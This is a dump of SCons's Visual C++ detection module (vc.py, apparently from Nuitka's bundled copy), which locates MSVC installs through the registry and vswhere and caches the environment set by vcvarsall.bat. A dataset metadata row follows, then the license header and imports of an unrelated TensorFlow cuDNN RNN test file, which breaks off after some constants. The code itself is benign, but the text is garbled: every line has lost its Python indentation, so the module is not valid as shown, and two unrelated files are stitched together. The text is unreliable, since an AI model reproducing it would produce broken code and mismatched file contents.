# in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY
# KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE
# WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
#
# TODO:
# * supported arch for versions: for old versions of batch file without
# argument, giving bogus argument cannot be detected, so we have to hardcode
# this here
# * print warning when msvc version specified but not found
# * find out why warnings do not print
# * test on 64 bits XP + VS 2005 (and VS 6 if possible)
# * SDK
# * Assembly
__revision__ = "src/engine/SCons/Tool/MSCommon/vc.py bee7caf9defd6e108fc2998a2520ddb36a967691 2019-12-17 02:07:09 bdeegan"
__doc__ = """Module for Visual C/C++ detection and configuration.
"""
import SCons.compat
import SCons.Util
import subprocess
import os
import platform
import sys
from string import digits as string_digits
if sys.version_info[0] == 2:
import collections
import SCons.Warnings
from SCons.Tool import find_program_path
from . import common
debug = common.debug
from . import sdk
get_installed_sdks = sdk.get_installed_sdks
class VisualCException(Exception):
pass
class UnsupportedVersion(VisualCException):
pass
class MSVCUnsupportedHostArch(VisualCException):
pass
class MSVCUnsupportedTargetArch(VisualCException):
pass
class MissingConfiguration(VisualCException):
pass
class NoVersionFound(VisualCException):
pass
class BatchFileExecutionError(VisualCException):
pass
# Dict to canonicalize the arch
_ARCH_TO_CANONICAL = {
"amd64" : "amd64",
"emt64" : "amd64",
"i386" : "x86",
"i486" : "x86",
"i586" : "x86",
"i686" : "x86",
"ia64" : "ia64", # deprecated
"itanium" : "ia64", # deprecated
"x86" : "x86",
"x86_64" : "amd64",
"arm" : "arm",
"arm64" : "arm64",
"aarch64" : "arm64",
}
_HOST_TARGET_TO_CL_DIR_GREATER_THAN_14 = {
("amd64","amd64") : ("Hostx64","x64"),
("amd64","x86") : ("Hostx64","x86"),
("amd64","arm") : ("Hostx64","arm"),
("amd64","arm64") : ("Hostx64","arm64"),
("x86","amd64") : ("Hostx86","x64"),
("x86","x86") : ("Hostx86","x86"),
("x86","arm") : ("Hostx86","arm"),
("x86","arm64") : ("Hostx86","arm64"),
}
# get path to the cl.exe dir for older VS versions
# based off a tuple of (host, target) platforms
_HOST_TARGET_TO_CL_DIR = {
("amd64","amd64") : "amd64",
("amd64","x86") : "amd64_x86",
("amd64","arm") : "amd64_arm",
("amd64","arm64") : "amd64_arm64",
("x86","amd64") : "x86_amd64",
("x86","x86") : "",
("x86","arm") : "x86_arm",
("x86","arm64") : "x86_arm64",
}
# Given a (host, target) tuple, return the argument for the bat file.
# Both host and target should be canonicalized.
_HOST_TARGET_ARCH_TO_BAT_ARCH = {
("x86", "x86"): "x86",
("x86", "amd64"): "x86_amd64",
("x86", "x86_amd64"): "x86_amd64",
("amd64", "x86_amd64"): "x86_amd64", # This is present in (at least) VS2012 express
("amd64", "amd64"): "amd64",
("amd64", "x86"): "x86",
("x86", "ia64"): "x86_ia64", # gone since 14.0
("arm", "arm"): "arm", # since 14.0, maybe gone 14.1?
("x86", "arm"): "x86_arm", # since 14.0
("x86", "arm64"): "x86_arm64", # since 14.1
("amd64", "arm"): "amd64_arm", # since 14.0
("amd64", "arm64"): "amd64_arm64", # since 14.1
}
_CL_EXE_NAME = 'cl.exe'
def get_msvc_version_numeric(msvc_version):
"""Get the raw version numbers from a MSVC_VERSION string, so it
could be cast to float or other numeric values. For example, '14.0Exp'
would get converted to '14.0'.
Args:
msvc_version: str
string representing the version number, could contain non
digit characters
Returns:
str: the value converted to a numeric only string
"""
return ''.join([x for x in msvc_version if x in string_digits + '.'])
def get_host_target(env):
debug('get_host_target()')
host_platform = env.get('HOST_ARCH')
if not host_platform:
host_platform = platform.machine()
# Solaris returns i86pc for both 32 and 64 bit architectures
if host_platform == "i86pc":
if platform.architecture()[0] == "64bit":
host_platform = "amd64"
else:
host_platform = "x86"
# Retain user requested TARGET_ARCH
req_target_platform = env.get('TARGET_ARCH')
debug('get_host_target() req_target_platform:%s'%req_target_platform)
if req_target_platform:
# If user requested a specific platform then only try that one.
target_platform = req_target_platform
else:
target_platform = host_platform
try:
host = _ARCH_TO_CANONICAL[host_platform.lower()]
except KeyError:
msg = "Unrecognized host architecture %s"
raise MSVCUnsupportedHostArch(msg % repr(host_platform))
try:
target = _ARCH_TO_CANONICAL[target_platform.lower()]
except KeyError:
all_archs = str(list(_ARCH_TO_CANONICAL.keys()))
raise MSVCUnsupportedTargetArch("Unrecognized target architecture %s\n\tValid architectures: %s" % (target_platform, all_archs))
return (host, target,req_target_platform)
# If you update this, update SupportedVSList in Tool/MSCommon/vs.py, and the
# MSVC_VERSION documentation in Tool/msvc.xml.
_VCVER = ["14.2", "14.1", "14.0", "14.0Exp", "12.0", "12.0Exp", "11.0", "11.0Exp", "10.0", "10.0Exp", "9.0", "9.0Exp","8.0", "8.0Exp","7.1", "7.0", "6.0"]
# if using vswhere, a further mapping is needed
_VCVER_TO_VSWHERE_VER = {
'14.2' : '[16.0, 17.0)',
'14.1' : '[15.0, 16.0)',
}
_VCVER_TO_PRODUCT_DIR = {
'14.2' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'')], # VS 2019 doesn't set this key
'14.1' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'')], # VS 2017 doesn't set this key
'14.0' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\14.0\Setup\VC\ProductDir')],
'14.0Exp' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VCExpress\14.0\Setup\VC\ProductDir')],
'12.0' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\12.0\Setup\VC\ProductDir'),
],
'12.0Exp' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VCExpress\12.0\Setup\VC\ProductDir'),
],
'11.0': [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\11.0\Setup\VC\ProductDir'),
],
'11.0Exp' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VCExpress\11.0\Setup\VC\ProductDir'),
],
'10.0': [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\10.0\Setup\VC\ProductDir'),
],
'10.0Exp' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VCExpress\10.0\Setup\VC\ProductDir'),
],
'9.0': [
(SCons.Util.HKEY_CURRENT_USER, r'Microsoft\DevDiv\VCForPython\9.0\installdir',),
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\9.0\Setup\VC\ProductDir',),
],
'9.0Exp' : [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VCExpress\9.0\Setup\VC\ProductDir'),
],
'8.0': [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\8.0\Setup\VC\ProductDir'),
],
'8.0Exp': [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VCExpress\8.0\Setup\VC\ProductDir'),
],
'7.1': [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\7.1\Setup\VC\ProductDir'),
],
'7.0': [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\7.0\Setup\VC\ProductDir'),
],
'6.0': [
(SCons.Util.HKEY_LOCAL_MACHINE, r'Microsoft\VisualStudio\6.0\Setup\Microsoft Visual C++\ProductDir'),
]
}
def msvc_version_to_maj_min(msvc_version):
msvc_version_numeric = get_msvc_version_numeric(msvc_version)
t = msvc_version_numeric.split(".")
if not len(t) == 2:
raise ValueError("Unrecognized version %s (%s)" % (msvc_version,msvc_version_numeric))
try:
maj = int(t[0])
min = int(t[1])
return maj, min
except ValueError as e:
raise ValueError("Unrecognized version %s (%s)" % (msvc_version,msvc_version_numeric))
def is_host_target_supported(host_target, msvc_version):
"""Check if (host, target) pair is supported for a VC version.
:note: only checks whether a given version *may* support the given (host,
target), not that the toolchain is actually present on the machine.
    :param tuple host_target: canonicalized host-target pair, e.g.
("x86", "amd64") for cross compilation from 32 bit Windows to 64 bits.
:param str msvc_version: Visual C++ version (major.minor), e.g. "10.0"
:returns: True or False
"""
# We assume that any Visual Studio version supports x86 as a target
if host_target[1] != "x86":
maj, min = msvc_version_to_maj_min(msvc_version)
if maj < 8:
return False
return True
def find_vc_pdir_vswhere(msvc_version):
"""
Find the MSVC product directory using the vswhere program.
:param msvc_version: MSVC version to search for
:return: MSVC install dir or None
:raises UnsupportedVersion: if the version is not known by this file
"""
try:
vswhere_version = _VCVER_TO_VSWHERE_VER[msvc_version]
except KeyError:
debug("Unknown version of MSVC: %s" % msvc_version)
raise UnsupportedVersion("Unknown version %s" % msvc_version)
# For bug 3333 - support default location of vswhere for both 64 and 32 bit windows
# installs.
for pf in ['Program Files (x86)', 'Program Files']:
vswhere_path = os.path.join(
'C:\\',
pf,
'Microsoft Visual Studio',
'Installer',
'vswhere.exe'
)
if os.path.exists(vswhere_path):
# If we found vswhere, then use it.
break
else:
# No vswhere on system, no install info available
return None
vswhere_cmd = [vswhere_path,
'-products', '*',
'-version', vswhere_version,
'-property', 'installationPath']
#TODO PY27 cannot use Popen as context manager
# try putting it back to the old way for now
sp = subprocess.Popen(vswhere_cmd,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE)
vsdir, err = sp.communicate()
if vsdir:
vsdir = vsdir.decode("mbcs").splitlines()
# vswhere could easily return multiple lines
# we could define a way to pick the one we prefer, but since
# this data is currently only used to make a check for existence,
# returning the first hit should be good enough for now.
vc_pdir = os.path.join(vsdir[0], 'VC')
return vc_pdir
else:
        # vswhere ran but reported no installation for this version
return None
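# Illustrative note (not from the original source): for MSVC_VERSION '14.1' the
# command assembled above is roughly
#   vswhere.exe -products * -version "[15.0, 16.0)" -property installationPath
# and the first installationPath returned gets 'VC' appended to form the
# product directory.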
def find_vc_pdir(msvc_version):
"""Find the MSVC product directory for the given version.
Tries to look up the path using a registry key from the table
    _VCVER_TO_PRODUCT_DIR; if there is no key, calls find_vc_pdir_vswhere
for help instead.
Args:
msvc_version: str
msvc version (major.minor, e.g. 10.0)
Returns:
str: Path found in registry, or None
Raises:
UnsupportedVersion: if the version is not known by this file.
MissingConfiguration: found version but the directory is missing.
Both exceptions inherit from VisualCException.
"""
root = 'Software\\'
try:
hkeys = _VCVER_TO_PRODUCT_DIR[msvc_version]
except KeyError:
debug("Unknown version of MSVC: %s" % msvc_version)
raise UnsupportedVersion("Unknown version %s" % msvc_version)
for hkroot, key in hkeys:
try:
comps = None
if not key:
comps = find_vc_pdir_vswhere(msvc_version)
if not comps:
debug('find_vc_pdir_vswhere(): no VC found for version {}'.format(repr(msvc_version)))
raise SCons.Util.WinError
debug('find_vc_pdir_vswhere(): VC found: {}'.format(repr(msvc_version)))
return comps
else:
if common.is_win64():
try:
# ordinally at win64, try Wow6432Node first.
comps = common.read_reg(root + 'Wow6432Node\\' + key, hkroot)
except SCons.Util.WinError as e:
# at Microsoft Visual Studio for Python 2.7, value is not in Wow6432Node
pass
if not comps:
# not Win64, or Microsoft Visual Studio for Python 2.7
comps = common.read_reg(root + key, hkroot)
except SCons.Util.WinError as e:
debug('find_vc_dir(): no VC registry key {}'.format(repr(key)))
else:
debug('find_vc_dir(): found VC in registry: {}'.format(comps))
if os.path.exists(comps):
return comps
else:
debug('find_vc_dir(): reg says dir is {}, but it does not exist. (ignoring)'.format(comps))
raise MissingConfiguration("registry dir {} not found on the filesystem".format(comps))
return None
def find_batch_file(env,msvc_version,host_arch,target_arch):
"""
Find the location of the batch script which should set up the compiler
for any TARGET_ARCH whose compilers were installed by Visual Studio/VCExpress
"""
pdir = find_vc_pdir(msvc_version)
if pdir is None:
raise NoVersionFound("No version of Visual Studio found")
debug('find_batch_file() in {}'.format(pdir))
# filter out e.g. "Exp" from the version name
msvc_ver_numeric = get_msvc_version_numeric(msvc_version)
vernum = float(msvc_ver_numeric)
if 7 <= vernum < 8:
pdir = os.path.join(pdir, os.pardir, "Common7", "Tools")
batfilename = os.path.join(pdir, "vsvars32.bat")
elif vernum < 7:
pdir = os.path.join(pdir, "Bin")
batfilename = os.path.join(pdir, "vcvars32.bat")
elif 8 <= vernum <= 14:
batfilename = os.path.join(pdir, "vcvarsall.bat")
else: # vernum >= 14.1 VS2017 and above
batfilename = os.path.join(pdir, "Auxiliary", "Build", "vcvarsall.bat")
if not os.path.exists(batfilename):
debug("Not found: %s" % batfilename)
batfilename = None
installed_sdks = get_installed_sdks()
for _sdk in installed_sdks:
sdk_bat_file = _sdk.get_sdk_vc_script(host_arch,target_arch)
if not sdk_bat_file:
debug("find_batch_file() not found:%s"%_sdk)
else:
sdk_bat_file_path = os.path.join(pdir,sdk_bat_file)
if os.path.exists(sdk_bat_file_path):
debug('find_batch_file() sdk_bat_file_path:%s'%sdk_bat_file_path)
return (batfilename, sdk_bat_file_path)
return (batfilename, None)
__INSTALLED_VCS_RUN = None
_VC_TOOLS_VERSION_FILE_PATH = ['Auxiliary', 'Build', 'Microsoft.VCToolsVersion.default.txt']
_VC_TOOLS_VERSION_FILE = os.sep.join(_VC_TOOLS_VERSION_FILE_PATH)
def _check_cl_exists_in_vc_dir(env, vc_dir, msvc_version):
"""Find the cl.exe on the filesystem in the vc_dir depending on
TARGET_ARCH, HOST_ARCH and the msvc version. TARGET_ARCH and
HOST_ARCH can be extracted from the passed env, unless its None,
which then the native platform is assumed the host and target.
Args:
env: Environment
a construction environment, usually if this is passed its
because there is a desired TARGET_ARCH to be used when searching
for a cl.exe
vc_dir: str
the path to the VC dir in the MSVC installation
msvc_version: str
msvc version (major.minor, e.g. 10.0)
Returns:
bool:
"""
# determine if there is a specific target platform we want to build for and
# use that to find a list of valid VCs, default is host platform == target platform
# and same for if no env is specified to extract target platform from
if env:
(host_platform, target_platform, req_target_platform) = get_host_target(env)
else:
host_platform = platform.machine().lower()
target_platform = host_platform
host_platform = _ARCH_TO_CANONICAL[host_platform]
target_platform = _ARCH_TO_CANONICAL[target_platform]
debug('_check_cl_exists_in_vc_dir(): host platform %s, target platform %s for version %s' % (host_platform, target_platform, msvc_version))
ver_num = float(get_msvc_version_numeric(msvc_version))
# make sure the cl.exe exists meaning the tool is installed
if ver_num > 14:
# 2017 and newer allowed multiple versions of the VC toolset to be installed at the same time.
# Just get the default tool version for now
#TODO: support setting a specific minor VC version
default_toolset_file = os.path.join(vc_dir, _VC_TOOLS_VERSION_FILE)
try:
with open(default_toolset_file) as f:
vc_specific_version = f.readlines()[0].strip()
except IOError:
debug('_check_cl_exists_in_vc_dir(): failed to read ' + default_toolset_file)
return False
except IndexError:
debug('_check_cl_exists_in_vc_dir(): failed to find MSVC version in ' + default_toolset_file)
return False
host_trgt_dir = _HOST_TARGET_TO_CL_DIR_GREATER_THAN_14.get((host_platform, target_platform), None)
if host_trgt_dir is None:
debug('_check_cl_exists_in_vc_dir(): unsupported host/target platform combo: (%s,%s)'%(host_platform, target_platform))
return False
cl_path = os.path.join(vc_dir, 'Tools','MSVC', vc_specific_version, 'bin', host_trgt_dir[0], host_trgt_dir[1], _CL_EXE_NAME)
debug('_check_cl_exists_in_vc_dir(): checking for ' + _CL_EXE_NAME + ' at ' + cl_path)
if os.path.exists(cl_path):
debug('_check_cl_exists_in_vc_dir(): found ' + _CL_EXE_NAME + '!')
return True
elif 8 <= ver_num <= 14:
# Use None as the "not found" default: "" (the x86/x86 entry) would
# incorrectly test as missing with a bare `if not host_trgt_dir` check.
host_trgt_dir = _HOST_TARGET_TO_CL_DIR.get((host_platform, target_platform), None)
if host_trgt_dir is None:
debug('_check_cl_exists_in_vc_dir(): unsupported host/target platform combo')
return False
cl_path = os.path.join(vc_dir, 'bin', host_trgt_dir, _CL_EXE_NAME)
debug('_check_cl_exists_in_vc_dir(): checking for ' + _CL_EXE_NAME + ' at ' + cl_path)
cl_path_exists = os.path.exists(cl_path)
if not cl_path_exists and host_platform == 'amd64':
# older versions of visual studio only had x86 binaries,
# so if the host platform is amd64, we need to check cross
# compile options (x86 binary compiles some other target on a 64 bit os)
# Use None as the "not found" default: "" (the x86/x86 entry) would
# incorrectly test as missing with a bare `if not host_trgt_dir` check.
host_trgt_dir = _HOST_TARGET_TO_CL_DIR.get(('x86', target_platform), None)
if host_trgt_dir is None:
return False
cl_path = os.path.join(vc_dir, 'bin', host_trgt_dir, _CL_EXE_NAME)
debug('_check_cl_exists_in_vc_dir(): checking for ' + _CL_EXE_NAME + ' at ' + cl_path)
cl_path_exists = os.path.exists(cl_path)
if cl_path_exists:
debug('_check_cl_exists_in_vc_dir(): found ' + _CL_EXE_NAME + '!')
return True
elif 6 <= ver_num < 8:
# not sure about these versions, so walk the VC dir (could be slow)
for root, _, files in os.walk(vc_dir):
if _CL_EXE_NAME in files:
debug('get_installed_vcs ' + _CL_EXE_NAME + ' found %s' % os.path.join(root, _CL_EXE_NAME))
return True
return False
else:
# version not supported, return False
debug('_check_cl_exists_in_vc_dir(): unsupported MSVC version: ' + str(ver_num))
return False
def cached_get_installed_vcs(env=None):
global __INSTALLED_VCS_RUN
if __INSTALLED_VCS_RUN is None:
ret = get_installed_vcs(env)
__INSTALLED_VCS_RUN = ret
return __INSTALLED_VCS_RUN
def get_installed_vcs(env=None):
installed_versions = []
for ver in _VCVER:
debug('trying to find VC %s' % ver)
try:
VC_DIR = find_vc_pdir(ver)
if VC_DIR:
debug('found VC %s' % ver)
if _check_cl_exists_in_vc_dir(env, VC_DIR, ver):
installed_versions.append(ver)
else:
debug('find_vc_pdir no compiler found %s' % ver)
else:
debug('find_vc_pdir return None for ver %s' % ver)
except (MSVCUnsupportedTargetArch, MSVCUnsupportedHostArch):
# Allow this exception to propagate further as it should cause
# SCons to exit with an error code
raise
except VisualCException as e:
debug('did not find VC %s: caught exception %s' % (ver, str(e)))
return installed_versions
def reset_installed_vcs():
"""Make it try again to find VC. This is just for the tests."""
global __INSTALLED_VCS_RUN
__INSTALLED_VCS_RUN = None
# Running these batch files isn't cheap: most of the time spent in
# msvs.generate() is due to vcvars*.bat. In a build that uses "tools='msvs'"
# in multiple environments, for example:
# env1 = Environment(tools='msvs')
# env2 = Environment(tools='msvs')
# we can greatly improve the speed of the second and subsequent Environment
# (or Clone) calls by memoizing the environment variables set by vcvars*.bat.
#
# Updated: by 2018, vcvarsall.bat had gotten so expensive (vs2017 era)
# it was breaking CI builds because the test suite starts scons so many
# times and the existing memo logic only helped with repeated calls
# within the same scons run. Windows builds on the CI system were split
# into chunks to get around single-build time limits.
# With VS2019 it got even slower and an optional persistent cache file
# was introduced. The cache now also stores only the parsed vars,
# not the entire output of running the batch file - saves a bit
# of time not parsing every time.
script_env_cache = None
def script_env(script, args=None):
global script_env_cache
if script_env_cache is None:
script_env_cache = common.read_script_env_cache()
cache_key = "{}--{}".format(script, args)
cache_data = script_env_cache.get(cache_key, None)
if cache_data is None:
stdout = common.get_output(script, args)
# Stupid batch files do not set return code: we take a look at the
# beginning of the output for an error message instead
olines = stdout.splitlines()
if olines[0].startswith("The specified configuration type is missing"):
raise BatchFileExecutionError("\n".join(olines[:2]))
cache_data = common.parse_output(stdout)
script_env_cache[cache_key] = cache_data
# once we updated cache, give a chance to write out if user wanted
common.write_script_env_cache(script_env_cache)
else:
#TODO: Python 2 cleanup
# If we "hit" data from the json file, we have a Py2 problem:
# keys & values will be unicode. don't detect, just convert.
if sys.version_info[0] == 2:
def convert(data):
if isinstance(data, basestring):
return str(data)
elif isinstance(data, collections.Mapping):
return dict(map(convert, data.iteritems()))
elif isinstance(data, collections.Iterable):
return type(data)(map(convert, data))
else:
return data
cache_data = convert(cache_data)
return cache_data
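# A minimal illustrative sketch of the memoization pattern described above,
# reduced to its essentials; `run_and_parse` is a hypothetical stand-in for
# running a vcvars*.bat file and parsing the environment variables it sets.
# Only the parsed dict is cached, keyed by (script, args), mirroring what the
# persistent cache file stores.
_DEMO_SCRIPT_ENV_CACHE = {}
def _demo_script_env(script, args, run_and_parse):
    # Run the batch file at most once per (script, args) combination.
    key = "{}--{}".format(script, args)
    if key not in _DEMO_SCRIPT_ENV_CACHE:
        _DEMO_SCRIPT_ENV_CACHE[key] = run_and_parse(script, args)
    return _DEMO_SCRIPT_ENV_CACHE[key]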
def get_default_version(env):
debug('get_default_version()')
msvc_version = env.get('MSVC_VERSION')
msvs_version = env.get('MSVS_VERSION')
debug('get_default_version(): msvc_version:%s msvs_version:%s'%(msvc_version,msvs_version))
if msvs_version and not msvc_version:
SCons.Warnings.warn(
SCons.Warnings.DeprecatedWarning,
"MSVS_VERSION is deprecated: please use MSVC_VERSION instead ")
return msvs_version
elif msvc_version and msvs_version:
if not msvc_version == msvs_version:
SCons.Warnings.warn(
SCons.Warnings.VisualVersionMismatch,
"Requested msvc version (%s) and msvs version (%s) do " \
"not match: please use MSVC_VERSION only to request a " \
"visual studio version, MSVS_VERSION is deprecated" \
% (msvc_version, msvs_version))
return msvs_version
if not msvc_version:
installed_vcs = cached_get_installed_vcs(env)
debug('installed_vcs:%s' % installed_vcs)
if not installed_vcs:
#msg = 'No installed VCs'
#debug('msv %s' % repr(msg))
#SCons.Warnings.warn(SCons.Warnings.VisualCMissingWarning, msg)
debug('msvc_setup_env: No installed VCs')
return None
msvc_version = installed_vcs[0]
debug('msvc_setup_env: using default installed MSVC version %s' % repr(msvc_version))
return msvc_version
def msvc_setup_env_once(env):
try:
has_run = env["MSVC_SETUP_RUN"]
except KeyError:
has_run = False
if not has_run:
msvc_setup_env(env)
env["MSVC_SETUP_RUN"] = True
def msvc_find_valid_batch_script(env, version):
debug('msvc_find_valid_batch_script()')
# Find the host platform, target platform, and if present the requested
# target platform
platforms = get_host_target(env)
debug(" msvs_find_valid_batch_script(): host_platform %s, target_platform %s req_target_platform:%s" % platforms)
host_platform, target_platform, req_target_platform = platforms
try_target_archs = [target_platform]
# VS2012 has a "cross compile" environment to build 64 bit
# with x86_amd64 as the argument to the batch setup script
if req_target_platform in ('amd64', 'x86_64'):
try_target_archs.append('x86_amd64')
elif not req_target_platform and target_platform in ['amd64', 'x86_64']:
# There may not be "native" amd64, but maybe "cross" x86_amd64 tools
try_target_archs.append('x86_amd64')
# If the user hasn't specifically requested a TARGET_ARCH, and
# the TARGET_ARCH is amd64, then also try 32-bit tools if there are no
# viable 64-bit tools installed
try_target_archs.append('x86')
debug("msvs_find_valid_batch_script(): host_platform: %s try_target_archs:%s"%(host_platform, try_target_archs))
d = None
for tp in try_target_archs:
# Set to current arch.
env['TARGET_ARCH']=tp
debug("msvc_find_valid_batch_script() trying target_platform:%s"%tp)
host_target = (host_platform, tp)
if not is_host_target_supported(host_target, version):
warn_msg = "host, target = %s not supported for MSVC version %s" % \
(host_target, version)
SCons.Warnings.warn(SCons.Warnings.VisualCMissingWarning, warn_msg)
arg = _HOST_TARGET_ARCH_TO_BAT_ARCH[host_target]
# Get just version numbers
maj, min = msvc_version_to_maj_min(version)
# VS2015+
if maj >= 14:
if env.get('MSVC_UWP_APP') == '1':
# Initialize environment variables with store/universal paths
arg += ' store'
# Try to locate a batch file for this host/target platform combo
try:
(vc_script, sdk_script) = find_batch_file(env, version, host_platform, tp)
debug('msvc_find_valid_batch_script() vc_script:%s sdk_script:%s'%(vc_script,sdk_script))
except VisualCException as e:
msg = str(e)
debug('Caught exception while looking for batch file (%s)' % msg)
warn_msg = "VC version %s not installed. " + \
"C/C++ compilers are most likely not set correctly.\n" + \
" Installed versions are: %s"
warn_msg = warn_msg % (version, cached_get_installed_vcs(env))
SCons.Warnings.warn(SCons.Warnings.VisualCMissingWarning, warn_msg)
continue
# Try to use the located batch file for this host/target platform combo
debug('msvc_find_valid_batch_script() use_script 2 %s, args:%s' % (repr(vc_script), arg))
found = None
if vc_script:
try:
d = script_env(vc_script, args=arg)
found = vc_script
except BatchFileExecutionError as e:
debug('msvc_find_valid_batch_script() use_script 3: failed running VC script %s: %s: Error:%s'%(repr(vc_script),arg,e))
vc_script=None
continue
if not vc_script and sdk_script:
debug('msvc_find_valid_batch_script() use_script 4: trying sdk script: %s'%(sdk_script))
try:
d = script_env(sdk_script)
found = sdk_script
except BatchFileExecutionError as e:
debug('msvc_find_valid_batch_script() use_script 5: failed running SDK script %s: Error:%s'%(repr(sdk_script),e))
continue
elif not vc_script and not sdk_script:
debug('msvc_find_valid_batch_script() use_script 6: Neither VC script nor SDK script found')
continue
debug("msvc_find_valid_batch_script() Found a working script/target: %s/%s"%(repr(found),arg))
break # We've found a working target_platform, so stop looking
# If we cannot find a viable installed compiler, reset the TARGET_ARCH
# to its initial value
if not d:
env['TARGET_ARCH']=req_target_platform
return d
def msvc_setup_env(env):
debug('msvc_setup_env()')
version = get_default_version(env)
if version is None:
warn_msg = "No version of Visual Studio compiler found - C/C++ " \
"compilers most likely not set correctly"
# Nuitka: Useless warning for us.
# SCons.Warnings.warn(SCons.Warnings.VisualCMissingWarning, warn_msg)
return None
debug('msvc_setup_env: using specified MSVC version %s' % repr(version))
# XXX: we set-up both MSVS version for backward
# compatibility with the msvs tool
env['MSVC_VERSION'] = version
env['MSVS_VERSION'] = version
env['MSVS'] = {}
use_script = env.get('MSVC_USE_SCRIPT', True)
if SCons.Util.is_String(use_script):
debug('msvc_setup_env() use_script 1 %s' % repr(use_script))
d = script_env(use_script)
elif use_script:
d = msvc_find_valid_batch_script(env,version)
debug('msvc_setup_env() use_script 2 %s' % d)
if not d:
return d
else:
debug('MSVC_USE_SCRIPT set to False')
warn_msg = "MSVC_USE_SCRIPT set to False, assuming environment " \
"set correctly."
# Nuitka: We use this on purpose.
# SCons.Warnings.warn(SCons.Warnings.VisualCMissingWarning, warn_msg)
return None
for k, v in d.items():
# Nuitka: Make the Windows SDK version visible in environment.
if k == "WindowsSDKVersion":
# Always just a single version if any.
if len(v) == 1:
env["WindowsSDKVersion"] = v[0].rstrip('\\')
elif len(v) == 0:
env["WindowsSDKVersion"] = None
else:
assert False, v
continue
debug('msvc_setup_env() env:%s -> %s'%(k,v))
env.PrependENVPath(k, v, delete_existing=True)
# final check to issue a warning if the compiler is not present
msvc_cl = find_program_path(env, 'cl')
if not msvc_cl:
SCons.Warnings.warn(SCons.Warnings.VisualCMissingWarning,
"Could not find MSVC compiler 'cl', it may need to be installed separately with Visual Studio")
def msvc_exists(env=None, version=None):
vcs = cached_get_installed_vcs(env)
if version is None:
return len(vcs) > 0
return version in vcs
|
kayhayen/Nuitka
|
nuitka/build/inline_copy/lib/scons-3.1.2/SCons/Tool/MSCommon/vc.py
|
Python
|
apache-2.0
| 33,537 | 0.006202 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for Cudnn RNN models."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import argparse
import collections
import functools
import itertools
import os
import sys
import unittest
import numpy as np
from tensorflow.contrib.cudnn_rnn.python.layers import cudnn_rnn
from tensorflow.contrib.cudnn_rnn.python.ops import cudnn_rnn_ops
from tensorflow.contrib.rnn.python.ops import rnn as contrib_rnn_lib
from tensorflow.python.eager import backprop
from tensorflow.python.eager import context
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.framework import test_util
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_nn_ops
from tensorflow.python.ops import gradients_impl as gradients
from tensorflow.python.ops import init_ops
from tensorflow.python.ops import math_ops
from tensorflow.python.ops import random_ops
from tensorflow.python.ops import rnn as rnn_lib
from tensorflow.python.ops import rnn_cell_impl
from tensorflow.python.ops import state_ops
from tensorflow.python.ops import variable_scope as vs
from tensorflow.python.ops import variables
from tensorflow.python.ops.losses import losses
from tensorflow.python.platform import googletest
from tensorflow.python.platform import test
from tensorflow.python.platform import tf_logging as logging
from tensorflow.python.training import adagrad
from tensorflow.python.training import adam
from tensorflow.python.training import gradient_descent
from tensorflow.python.training import momentum
from tensorflow.python.training import rmsprop
from tensorflow.python.training import saver as saver_lib
from tensorflow.python.training.checkpointable import util as checkpointable_utils
CUDNN_LSTM = cudnn_rnn_ops.CUDNN_LSTM
CUDNN_GRU = cudnn_rnn_ops.CUDNN_GRU
CUDNN_RNN_RELU = cudnn_rnn_ops.CUDNN_RNN_RELU
CUDNN_RNN_TANH = cudnn_rnn_ops.CUDNN_RNN_TANH
CUDNN_RNN_UNIDIRECTION = cudnn_rnn_ops.CUDNN_RNN_UNIDIRECTION
CUDNN_RNN_BIDIRECTION = cudnn_rnn_ops.CUDNN_RNN_BIDIRECTION
CUDNN_LSTM_PARAMS_PER_LAYER = cudnn_rnn_ops.CUDNN_LSTM_PARAMS_PER_LAYER
CUDNN_GRU_PARAMS_PER_LAYER = cudnn_rnn_ops.CUDNN_GRU_PARAMS_PER_LAYER
CUDNN_RNN_TANH_PARAMS_PER_LAYER = cudnn_rnn_ops.CUDNN_RNN_TANH_PARAMS_PER_LAYER
